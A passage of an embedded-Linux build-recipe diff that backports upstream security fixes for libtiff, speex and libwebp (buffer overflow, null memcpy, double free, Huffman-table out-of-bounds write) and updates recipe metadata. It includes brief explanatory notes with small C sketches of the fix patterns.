++ tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
++ tif->tif_flags |= TIFF_ISTILED;
++ }
++ if (!tif->tif_dir.td_nstrips) {
++ TIFFErrorExt(tif->tif_clientdata, module,
++ "Cannot handle zero number of %s",
++ isTiled(tif) ? "tiles" : "strips");
++ goto bad;
++ }
++ tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
++ if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
++ tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
++ if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
++#ifdef OJPEG_SUPPORT
++ if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
++ (isTiled(tif)==0) &&
++ (tif->tif_dir.td_nstrips==1)) {
++ /*
++ * XXX: OJPEG hack.
++ * If a) compression is OJPEG, b) it's not a tiled TIFF,
++ * and c) the number of strips is 1,
++ * then we tolerate the absence of stripoffsets tag,
++ * because, presumably, all required data is in the
++ * JpegInterchangeFormat stream.
++ */
++ TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
++ } else
++#endif
++ {
++ MissingRequired(tif,
++ isTiled(tif) ? "TileOffsets" : "StripOffsets");
++ goto bad;
++ }
++ }
++
++ if( tif->tif_mode == O_RDWR &&
++ tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
++ tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
++ tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
++ tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
++ tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
++ {
++ /* Directory typically created with TIFFDeferStrileArrayWriting() */
++ TIFFSetupStrips(tif);
++ }
++ else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
++ {
++ if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
++ {
++ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
++ tif->tif_dir.td_nstrips,
++ &tif->tif_dir.td_stripoffset_p))
++ {
++ goto bad;
++ }
++ }
++ if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
++ {
++ if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
++ tif->tif_dir.td_nstrips,
++ &tif->tif_dir.td_stripbytecount_p))
++ {
++ goto bad;
++ }
++ }
++ }
++
+ /*
+ * Make sure all non-color channels are extrasamples.
+ * If it's not the case, define them as such.
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
new file mode 100644
index 0000000000..e59f5aad55
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1355.patch
@@ -0,0 +1,62 @@
+From fb1db384959698edd6caeea84e28253d272a0f96 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 2 Apr 2022 22:33:31 +0200
+Subject: [PATCH] tiffcp: avoid buffer overflow in "mode" string (fixes #400)
+
+CVE: CVE-2022-1355
+
+Upstream-Status: Backport
+[https://gitlab.com/libtiff/libtiff/-/commit/c1ae29f9ebacd29b7c3e0c7db671af7db3584bc2]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ tools/tiffcp.c | 25 ++++++++++++++++++++-----
+ 1 file changed, 20 insertions(+), 5 deletions(-)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index fd129bb7..8d944ff6 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -274,19 +274,34 @@ main(int argc, char* argv[])
+ deftilewidth = atoi(optarg);
+ break;
+ case 'B':
+- *mp++ = 'b'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'b'; *mp = '\0';
++ }
+ break;
+ case 'L':
+- *mp++ = 'l'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'l'; *mp = '\0';
++ }
+ break;
+ case 'M':
+- *mp++ = 'm'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'm'; *mp = '\0';
++ }
+ break;
+ case 'C':
+- *mp++ = 'c'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode) - 1))
++ {
++ *mp++ = 'c'; *mp = '\0';
++ }
+ break;
+ case '8':
+- *mp++ = '8'; *mp = '\0';
++ if (strlen(mode) < (sizeof(mode)-1))
++ {
++ *mp++ = '8'; *mp = '\0';
++ }
+ break;
+ case 'x':
+ pageInSeq = 1;
+--
+2.25.1
+
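The overflow came from appending one character per repeated command-line flag into the fixed-size mode[] buffer with a bare *mp++; the fix checks strlen(mode) against sizeof(mode) - 1 before each append. A sketch of the same bound as a helper (the real tool repeats the check at each case label):

    #include <stdio.h>
    #include <string.h>

    /* Append one character to a fixed-size, NUL-terminated string only if
     * it still fits; repeated flags past the capacity are ignored. */
    static void mode_append(char *mode, size_t cap, char c)
    {
        size_t len = strlen(mode);
        if (len < cap - 1) {
            mode[len] = c;
            mode[len + 1] = '\0';
        }
    }

    int main(void)
    {
        char mode[10] = "w";
        /* Even 100 repetitions of -B cannot run past the buffer. */
        for (int i = 0; i < 100; i++)
            mode_append(mode, sizeof(mode), 'b');
        printf("%s\n", mode);   /* "wbbbbbbbb": capped at 9 chars plus NUL */
        return 0;
    }
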
diff --git a/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
new file mode 100644
index 0000000000..fc5d0ab5f4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/eecb0712f4c3a5b449f70c57988260a667ddbdef.patch
@@ -0,0 +1,30 @@
+From eecb0712f4c3a5b449f70c57988260a667ddbdef Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 6 Feb 2022 13:08:38 +0100
+Subject: [PATCH] TIFFFetchStripThing(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0561
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 23194ced..50ebf8ac 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -5683,8 +5682,9 @@
+ _TIFFfree(data);
+ return(0);
+ }
+- _TIFFmemcpy(resizeddata,data,(uint32)dir->tdir_count*sizeof(uint64));
+- _TIFFmemset(resizeddata+(uint32)dir->tdir_count,0,(nstrips-(uint32)dir->tdir_count)*sizeof(uint64));
++ if( dir->tdir_count )
++ _TIFFmemcpy(resizeddata,data, (uint32)dir->tdir_count * sizeof(uint64));
++ _TIFFmemset(resizeddata+(uint32)dir->tdir_count, 0, (nstrips - (uint32)dir->tdir_count) * sizeof(uint64));
+ _TIFFfree(data);
+ data=resizeddata;
+ }
diff --git a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
index 1f92c18513..7efaba3a38 100644
--- a/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
+++ b/meta/recipes-multimedia/libtiff/tiff_4.1.0.bb
@@ -1,10 +1,59 @@
SUMMARY = "Provides support for the Tag Image File Format (TIFF)"
+DESCRIPTION = "Library provides support for the Tag Image File Format \
+(TIFF), a widely used format for storing image data. This library \
+provides means to easily access and create TIFF image files."
+HOMEPAGE = "http://www.libtiff.org/"
LICENSE = "BSD-2-Clause"
LIC_FILES_CHKSUM = "file://COPYRIGHT;md5=34da3db46fab7501992f9615d7e158cf"
CVE_PRODUCT = "libtiff"
SRC_URI = "http://download.osgeo.org/libtiff/tiff-${PV}.tar.gz \
+ file://CVE-2020-35523.patch \
+ file://CVE-2020-35524-1.patch \
+ file://CVE-2020-35524-2.patch \
+ file://001_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://002_support_patch_for_CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://CVE-2020-35521_and_CVE-2020-35522.patch \
+ file://0001-tiffset-fix-global-buffer-overflow-for-ASCII-tags-wh.patch \
+ file://561599c99f987dc32ae110370cfdd7df7975586b.patch \
+ file://eecb0712f4c3a5b449f70c57988260a667ddbdef.patch \
+ file://CVE-2022-0865.patch \
+ file://CVE-2022-0908.patch \
+ file://CVE-2022-0907.patch \
+ file://CVE-2022-0909.patch \
+ file://CVE-2022-0891.patch \
+ file://CVE-2022-0924.patch \
+ file://CVE-2022-2056-CVE-2022-2057-CVE-2022-2058.patch \
+ file://CVE-2022-34526.patch \
+ file://CVE-2022-2867-CVE-2022-2868-CVE-2022-2869.patch \
+ file://CVE-2022-1354.patch \
+ file://CVE-2022-1355.patch \
+ file://CVE-2022-3570_3598.patch \
+ file://CVE-2022-3597_3626_3627.patch \
+ file://CVE-2022-3599.patch \
+ file://CVE-2022-3970.patch \
+ file://CVE-2022-48281.patch \
+ file://CVE-2023-0795_0796_0797_0798_0799.patch \
+ file://CVE-2023-0800_0801_0802_0803_0804.patch \
+ file://CVE-2023-1916.patch \
+ file://CVE-2023-25433.patch \
+ file://CVE-2023-25434-CVE-2023-25435.patch \
+ file://CVE-2023-26965.patch \
+ file://CVE-2023-26966.patch \
+ file://CVE-2023-2908.patch \
+ file://CVE-2023-3316.patch \
+ file://CVE-2023-3576.patch \
+ file://CVE-2023-3618.patch \
+ file://CVE-2023-40745.patch \
+ file://CVE-2023-41175.patch \
+ file://CVE-2022-40090.patch \
+ file://CVE-2023-6228.patch \
+ file://CVE-2023-6277-1.patch \
+ file://CVE-2023-6277-2.patch \
+ file://CVE-2023-6277-3.patch \
+ file://CVE-2023-6277-4.patch \
+ file://CVE-2023-52356.patch \
"
SRC_URI[md5sum] = "2165e7aba557463acc0664e71a3ed424"
SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d6775b8634"
@@ -12,6 +61,10 @@ SRC_URI[sha256sum] = "5d29f32517dadb6dbcd1255ea5bbc93a2b54b94fbf83653b4d65c7d677
# exclude betas
UPSTREAM_CHECK_REGEX = "tiff-(?P<pver>\d+(\.\d+)+).tar"
+# Tested with check from https://security-tracker.debian.org/tracker/CVE-2015-7313
+# and 4.1.0 doesn't have the issue
+CVE_CHECK_WHITELIST += "CVE-2015-7313"
+
inherit autotools multilib_header
CACHED_CONFIGUREVARS = "ax_cv_check_gl_libgl=no"
diff --git a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
index 00ca3675ca..d603602584 100644
--- a/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
+++ b/meta/recipes-multimedia/mpeg2dec/mpeg2dec_0.5.1.bb
@@ -1,5 +1,9 @@
SUMMARY = "Library and test program for decoding MPEG-2 and MPEG-1 video streams"
-HOMEPAGE = "http://libmpeg2.sourceforge.net/"
+DESCRIPTION = "mpeg2dec is a test program for libmpeg2. It decodes \
+mpeg-1 and mpeg-2 video streams, and also includes a demultiplexer \
+for mpeg-1 and mpeg-2 program streams. The main purpose of mpeg2dec \
+is to have a simple test bed for libmpeg2."
+HOMEPAGE = "https://libmpeg2.sourceforge.io/"
SECTION = "libs"
LICENSE = "GPLv2+"
LICENSE_FLAGS = "commercial"
diff --git a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
index c7f3e67022..317983edb2 100644
--- a/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
+++ b/meta/recipes-multimedia/pulseaudio/pulseaudio.inc
@@ -1,4 +1,6 @@
SUMMARY = "Sound server for Linux and Unix-like operating systems"
+DESCRIPTION = "A general purpose sound server intended to run as a middleware \
+between your applications and your hardware devices, either using ALSA or OSS."
HOMEPAGE = "http://www.pulseaudio.org"
AUTHOR = "Lennart Poettering"
SECTION = "libs/multimedia"
@@ -137,11 +139,6 @@ EXTRA_OECONF_append_armeb = "${@bb.utils.contains("TUNE_FEATURES", "neon", "", "
export TARGET_PFPU = "${TARGET_FPU}"
-# TODO: Use more fine granular version
-#OE_LT_RPATH_ALLOW=":${libdir}/pulse-0.9:"
-OE_LT_RPATH_ALLOW = "any"
-OE_LT_RPATH_ALLOW[export]="1"
-
set_cfg_value () {
sed -i -e "s/\(; *\)\?$2 =.*/$2 = $3/" "$1"
if ! grep -q "^$2 = $3\$" "$1"; then
diff --git a/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
new file mode 100644
index 0000000000..eb16e95ffc
--- /dev/null
+++ b/meta/recipes-multimedia/speex/speex/CVE-2020-23903.patch
@@ -0,0 +1,30 @@
+Backport patch to fix CVE-2020-23903.
+
+CVE: CVE-2020-23903
+Upstream-Status: Backport [https://github.com/xiph/speex/commit/870ff84]
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 870ff845b32f314aec0036641ffe18aba4916887 Mon Sep 17 00:00:00 2001
+From: Tristan Matthews <tmatth@videolan.org>
+Date: Mon, 13 Jul 2020 23:25:03 -0400
+Subject: [PATCH] wav_io: guard against invalid channel numbers
+
+Fixes #13
+---
+ src/wav_io.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/wav_io.c b/src/wav_io.c
+index b5183015..09d62eb0 100644
+--- a/src/wav_io.c
++++ b/src/wav_io.c
+@@ -111,7 +111,7 @@ int read_wav_header(FILE *file, int *rate, int *channels, int *format, spx_int32
+ stmp = le_short(stmp);
+ *channels = stmp;
+
+- if (stmp>2)
++ if (stmp>2 || stmp<1)
+ {
+ fprintf (stderr, "Only mono and (intensity) stereo supported\n");
+ return -1;
diff --git a/meta/recipes-multimedia/speex/speex_1.2.0.bb b/meta/recipes-multimedia/speex/speex_1.2.0.bb
index 3a0911d6f8..ea475f0f1b 100644
--- a/meta/recipes-multimedia/speex/speex_1.2.0.bb
+++ b/meta/recipes-multimedia/speex/speex_1.2.0.bb
@@ -7,7 +7,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=314649d8ba9dd7045dfb6683f298d0a8 \
file://include/speex/speex.h;beginline=1;endline=34;md5=ef8c8ea4f7198d71cf3509c6ed05ea50"
DEPENDS = "libogg speexdsp"
-SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz"
+SRC_URI = "http://downloads.xiph.org/releases/speex/speex-${PV}.tar.gz \
+ file://CVE-2020-23903.patch \
+ "
UPSTREAM_CHECK_REGEX = "speex-(?P<pver>\d+(\.\d+)+)\.tar"
SRC_URI[md5sum] = "8ab7bb2589110dfaf0ed7fa7757dc49c"
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
new file mode 100644
index 0000000000..d293ab93ab
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-1999.patch
@@ -0,0 +1,55 @@
+From a486d800b60d0af4cc0836bf7ed8f21e12974129 Mon Sep 17 00:00:00 2001
+From: James Zern <jzern@google.com>
+Date: Wed, 22 Feb 2023 22:15:47 -0800
+Subject: [PATCH] EncodeAlphaInternal: clear result->bw on error
+
+This avoids a double free should the function fail prior to
+VP8BitWriterInit() and a previous trial result's buffer carried over.
+Previously in ApplyFiltersAndEncode() trial.bw (with a previous
+iteration's buffer) would be freed, followed by best.bw pointing to the
+same buffer.
+
+Since:
+187d379d add a fallback to ALPHA_NO_COMPRESSION
+
+In addition, check the return value of VP8BitWriterInit() in this
+function.
+
+Bug: webp:603
+Change-Id: Ic258381ee26c8c16bc211d157c8153831c8c6910
+
+CVE: CVE-2023-1999
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/a486d800b60d0af4cc0836bf7ed8f21e12974129]
+Signed-off-by: Nikhil R <nikhil.r@kpit.com>
+---
+ src/enc/alpha_enc.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/enc/alpha_enc.c b/src/enc/alpha_enc.c
+index f7c02690e3..7d205586fe 100644
+--- a/src/enc/alpha_enc.c
++++ b/src/enc/alpha_enc.c
+@@ -13,6 +13,7 @@
+
+ #include <assert.h>
+ #include <stdlib.h>
++#include <string.h>
+
+ #include "src/enc/vp8i_enc.h"
+ #include "src/dsp/dsp.h"
+@@ -148,6 +149,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+ }
+ } else {
+ VP8LBitWriterWipeOut(&tmp_bw);
++ memset(&result->bw, 0, sizeof(result->bw));
+ return 0;
+ }
+ }
+@@ -162,7 +164,7 @@ static int EncodeAlphaInternal(const uint8_t* const data, int width, int height,
+ header = method | (filter << 2);
+ if (reduce_levels) header |= ALPHA_PREPROCESSED_LEVELS << 4;
+
+- VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size);
++ if (!VP8BitWriterInit(&result->bw, ALPHA_HEADER_LEN + output_size)) ok = 0;
+ ok = ok && VP8BitWriterAppend(&result->bw, &header, ALPHA_HEADER_LEN);
+ ok = ok && VP8BitWriterAppend(&result->bw, output, output_size);
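The double free happened because a failing trial left result->bw pointing at a buffer a previous iteration still owned; zeroing the writer on the error path makes the caller's later cleanup a no-op. A small sketch of that clear-on-error pattern with a toy bitwriter type (not libwebp's VP8BitWriter):

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* Toy bit-writer; stands in for VP8BitWriter in this sketch. */
    struct bitwriter {
        unsigned char *buf;
        size_t size;
    };

    static void bw_free(struct bitwriter *bw)
    {
        free(bw->buf);
        bw->buf = NULL;
        bw->size = 0;
    }

    /* Attempt an encode.  On failure the out-parameter is cleared, so a
     * caller that frees it unconditionally cannot free a stale (or shared)
     * buffer a second time. */
    static int try_encode(struct bitwriter *out, int should_fail)
    {
        if (should_fail) {
            memset(out, 0, sizeof(*out));   /* the crucial line from the fix */
            return 0;
        }
        out->size = 16;
        out->buf = malloc(out->size);
        return out->buf != NULL;
    }

    int main(void)
    {
        struct bitwriter best = { NULL, 0 };
        struct bitwriter trial = { NULL, 0 };

        (void)try_encode(&best, 0);         /* first trial succeeds */
        if (!try_encode(&trial, 1)) {       /* later trial fails */
            bw_free(&trial);                /* harmless: trial was zeroed */
        }
        bw_free(&best);                     /* the real buffer is freed once */
        return 0;
    }
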
diff --git a/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
new file mode 100644
index 0000000000..419b12f7d9
--- /dev/null
+++ b/meta/recipes-multimedia/webp/files/CVE-2023-4863-0001.patch
@@ -0,0 +1,366 @@
+From 902bc9190331343b2017211debcec8d2ab87e17a Mon Sep 17 00:00:00 2001
+From: Vincent Rabaud <vrabaud@google.com>
+Date: Thu, 7 Sep 2023 21:16:03 +0200
+Subject: [PATCH 1/2] Fix OOB write in BuildHuffmanTable.
+
+First, BuildHuffmanTable is called to check if the data is valid.
+If it is and the table is not big enough, more memory is allocated.
+
+This will make sure that valid (but unoptimized because of unbalanced
+codes) streams are still decodable.
+
+Bug: chromium:1479274
+Change-Id: I31c36dbf3aa78d35ecf38706b50464fd3d375741
+
+CVE: CVE-2023-4863
+
+Upstream-Status: Backport [https://github.com/webmproject/libwebp/commit/902bc9190331343b2017211debcec8d2ab87e17a]
+
+Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com>
+---
+ src/dec/vp8l_dec.c | 46 ++++++++++---------
+ src/dec/vp8li_dec.h | 2 +-
+ src/utils/huffman_utils.c | 97 +++++++++++++++++++++++++++++++--------
+ src/utils/huffman_utils.h | 27 +++++++++--
+ 4 files changed, 129 insertions(+), 43 deletions(-)
+
+diff --git a/src/dec/vp8l_dec.c b/src/dec/vp8l_dec.c
+index 93615d4..0d38314 100644
+--- a/src/dec/vp8l_dec.c
++++ b/src/dec/vp8l_dec.c
+@@ -253,11 +253,11 @@ static int ReadHuffmanCodeLengths(
+ int symbol;
+ int max_symbol;
+ int prev_code_len = DEFAULT_CODE_LENGTH;
+- HuffmanCode table[1 << LENGTHS_TABLE_BITS];
++ HuffmanTables tables;
+
+- if (!VP8LBuildHuffmanTable(table, LENGTHS_TABLE_BITS,
+- code_length_code_lengths,
+- NUM_CODE_LENGTH_CODES)) {
++ if (!VP8LHuffmanTablesAllocate(1 << LENGTHS_TABLE_BITS, &tables) ||
++ !VP8LBuildHuffmanTable(&tables, LENGTHS_TABLE_BITS,
++ code_length_code_lengths, NUM_CODE_LENGTH_CODES)) {
+ goto End;
+ }
+
+@@ -277,7 +277,7 @@ static int ReadHuffmanCodeLengths(
+ int code_len;
+ if (max_symbol-- == 0) break;
+ VP8LFillBitWindow(br);
+- p = &table[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
++ p = &tables.curr_segment->start[VP8LPrefetchBits(br) & LENGTHS_TABLE_MASK];
+ VP8LSetBitPos(br, br->bit_pos_ + p->bits);
+ code_len = p->value;
+ if (code_len < kCodeLengthLiterals) {
+@@ -300,6 +300,7 @@ static int ReadHuffmanCodeLengths(
+ ok = 1;
+
+ End:
++ VP8LHuffmanTablesDeallocate(&tables);
+ if (!ok) dec->status_ = VP8_STATUS_BITSTREAM_ERROR;
+ return ok;
+ }
+@@ -307,7 +308,8 @@ static int ReadHuffmanCodeLengths(
+ // 'code_lengths' is pre-allocated temporary buffer, used for creating Huffman
+ // tree.
+ static int ReadHuffmanCode(int alphabet_size, VP8LDecoder* const dec,
+- int* const code_lengths, HuffmanCode* const table) {
++ int* const code_lengths,
++ HuffmanTables* const table) {
+ int ok = 0;
+ int size = 0;
+ VP8LBitReader* const br = &dec->br_;
+@@ -362,8 +364,7 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ VP8LMetadata* const hdr = &dec->hdr_;
+ uint32_t* huffman_image = NULL;
+ HTreeGroup* htree_groups = NULL;
+- HuffmanCode* huffman_tables = NULL;
+- HuffmanCode* huffman_table = NULL;
++ HuffmanTables* huffman_tables = &hdr->huffman_tables_;
+ int num_htree_groups = 1;
+ int num_htree_groups_max = 1;
+ int max_alphabet_size = 0;
+@@ -372,6 +373,10 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ int* mapping = NULL;
+ int ok = 0;
+
++ // Check the table has been 0 initialized (through InitMetadata).
++ assert(huffman_tables->root.start == NULL);
++ assert(huffman_tables->curr_segment == NULL);
++
+ if (allow_recursion && VP8LReadBits(br, 1)) {
+ // use meta Huffman codes.
+ const int huffman_precision = VP8LReadBits(br, 3) + 2;
+@@ -434,16 +439,15 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+
+ code_lengths = (int*)WebPSafeCalloc((uint64_t)max_alphabet_size,
+ sizeof(*code_lengths));
+- huffman_tables = (HuffmanCode*)WebPSafeMalloc(num_htree_groups * table_size,
+- sizeof(*huffman_tables));
+ htree_groups = VP8LHtreeGroupsNew(num_htree_groups);
+
+- if (htree_groups == NULL || code_lengths == NULL || huffman_tables == NULL) {
++ if (htree_groups == NULL || code_lengths == NULL ||
++ !VP8LHuffmanTablesAllocate(num_htree_groups * table_size,
++ huffman_tables)) {
+ dec->status_ = VP8_STATUS_OUT_OF_MEMORY;
+ goto Error;
+ }
+
+- huffman_table = huffman_tables;
+ for (i = 0; i < num_htree_groups_max; ++i) {
+ // If the index "i" is unused in the Huffman image, just make sure the
+ // coefficients are valid but do not store them.
+@@ -468,19 +472,20 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ int max_bits = 0;
+ for (j = 0; j < HUFFMAN_CODES_PER_META_CODE; ++j) {
+ int alphabet_size = kAlphabetSize[j];
+- htrees[j] = huffman_table;
+ if (j == 0 && color_cache_bits > 0) {
+ alphabet_size += (1 << color_cache_bits);
+ }
+- size = ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_table);
++ size =
++ ReadHuffmanCode(alphabet_size, dec, code_lengths, huffman_tables);
++ htrees[j] = huffman_tables->curr_segment->curr_table;
+ if (size == 0) {
+ goto Error;
+ }
+ if (is_trivial_literal && kLiteralMap[j] == 1) {
+- is_trivial_literal = (huffman_table->bits == 0);
++ is_trivial_literal = (htrees[j]->bits == 0);
+ }
+- total_size += huffman_table->bits;
+- huffman_table += size;
++ total_size += htrees[j]->bits;
++ huffman_tables->curr_segment->curr_table += size;
+ if (j <= ALPHA) {
+ int local_max_bits = code_lengths[0];
+ int k;
+@@ -515,14 +520,13 @@ static int ReadHuffmanCodes(VP8LDecoder* const dec, int xsize, int ysize,
+ hdr->huffman_image_ = huffman_image;
+ hdr->num_htree_groups_ = num_htree_groups;
+ hdr->htree_groups_ = htree_groups;
+- hdr->huffman_tables_ = huffman_tables;
+
+ Error:
+ WebPSafeFree(code_lengths);
+ WebPSafeFree(mapping);
+ if (!ok) {
+ WebPSafeFree(huffman_image);
+- WebPSafeFree(huffman_tables);
++ VP8LHuffmanTablesDeallocate(huffman_tables);
+ VP8LHtreeGroupsFree(htree_groups);
+ }
+ return ok;
+@@ -1354,7 +1358,7 @@ static void ClearMetadata(VP8LMetadata* const hdr) {
+ assert(hdr != NULL);
+
+ WebPSafeFree(hdr->huffman_image_);
+- WebPSafeFree(hdr->huffman_tables_);
++ VP8LHuffmanTablesDeallocate(&hdr->huffman_tables_);
+ VP8LHtreeGroupsFree(hdr->htree_groups_);
+ VP8LColorCacheClear(&hdr->color_cache_);
+ VP8LColorCacheClear(&hdr->saved_color_cache_);
+@@ -1670,7 +1674,7 @@ int VP8LDecodeImage(VP8LDecoder* const dec) {
+ // Sanity checks.
+ if (dec == NULL) return 0;
+
+- assert(dec->hdr_.huffman_tables_ != NULL);
++ assert(dec->hdr_.huffman_tables_.root.start != NULL);
+ assert(dec->hdr_.htree_groups_ != NULL);
+ assert(dec->hdr_.num_htree_groups_ > 0);
+
+diff --git a/src/dec/vp8li_dec.h b/src/dec/vp8li_dec.h
+index 72b2e86..32540a4 100644
+--- a/src/dec/vp8li_dec.h
++++ b/src/dec/vp8li_dec.h
+@@ -51,7 +51,7 @@ typedef struct {
+ uint32_t* huffman_image_;
+ int num_htree_groups_;
+ HTreeGroup* htree_groups_;
+- HuffmanCode* huffman_tables_;
++ HuffmanTables huffman_tables_;
+ } VP8LMetadata;
+
+ typedef struct VP8LDecoder VP8LDecoder;
+diff --git a/src/utils/huffman_utils.c b/src/utils/huffman_utils.c
+index 0cba0fb..9efd628 100644
+--- a/src/utils/huffman_utils.c
++++ b/src/utils/huffman_utils.c
+@@ -177,21 +177,24 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
+ if (num_open < 0) {
+ return 0;
+ }
+- if (root_table == NULL) continue;
+ for (; count[len] > 0; --count[len]) {
+ HuffmanCode code;
+ if ((key & mask) != low) {
+- table += table_size;
++ if (root_table != NULL) table += table_size;
+ table_bits = NextTableBitSize(count, len, root_bits);
+ table_size = 1 << table_bits;
+ total_size += table_size;
+ low = key & mask;
+- root_table[low].bits = (uint8_t)(table_bits + root_bits);
+- root_table[low].value = (uint16_t)((table - root_table) - low);
++ if (root_table != NULL) {
++ root_table[low].bits = (uint8_t)(table_bits + root_bits);
++ root_table[low].value = (uint16_t)((table - root_table) - low);
++ }
++ }
++ if (root_table != NULL) {
++ code.bits = (uint8_t)(len - root_bits);
++ code.value = (uint16_t)sorted[symbol++];
++ ReplicateValue(&table[key >> root_bits], step, table_size, code);
+ }
+- code.bits = (uint8_t)(len - root_bits);
+- code.value = (uint16_t)sorted[symbol++];
+- ReplicateValue(&table[key >> root_bits], step, table_size, code);
+ key = GetNextKey(key, len);
+ }
+ }
+@@ -211,25 +214,83 @@ static int BuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
+ ((1 << MAX_CACHE_BITS) + NUM_LITERAL_CODES + NUM_LENGTH_CODES)
+ // Cut-off value for switching between heap and stack allocation.
+ #define SORTED_SIZE_CUTOFF 512
+-int VP8LBuildHuffmanTable(HuffmanCode* const root_table, int root_bits,
++int VP8LBuildHuffmanTable(HuffmanTables* const root_table, int root_bits,
+ const int code_lengths[], int code_lengths_size) {
+- int total_size;
++ const int total_size =
++ BuildHuffmanTable(NULL, root_bits, code_lengths, code_lengths_size, NULL);
+ assert(code_lengths_size <= MAX_CODE_LENGTHS_SIZE);
+- if (root_table == NULL) {
+- total_size = BuildHuffmanTable(NULL, root_bits,
+- code_lengths, code_lengths_size, NULL);
+- } else if (code_lengths_size <= SORTED_SIZE_CUTOFF) {
++ if (total_size == 0 || root_table == NULL) return total_size;
++
++ if (root_table->curr_segment->curr_table + total_size >=
++ root_table->curr_segment->start + root_table->curr_segment->size) {
++ // If 'root_table' does not have enough memory, allocate a new segment.
++ // The available part of root_table->curr_segment is left unused because we
++ // need a contiguous buffer.
++ const int segment_size = root_table->curr_segment->size;
++ struct HuffmanTablesSegment* next =
++ (HuffmanTablesSegment*)WebPSafeMalloc(1, sizeof(*next));
++ if (next == NULL) return 0;
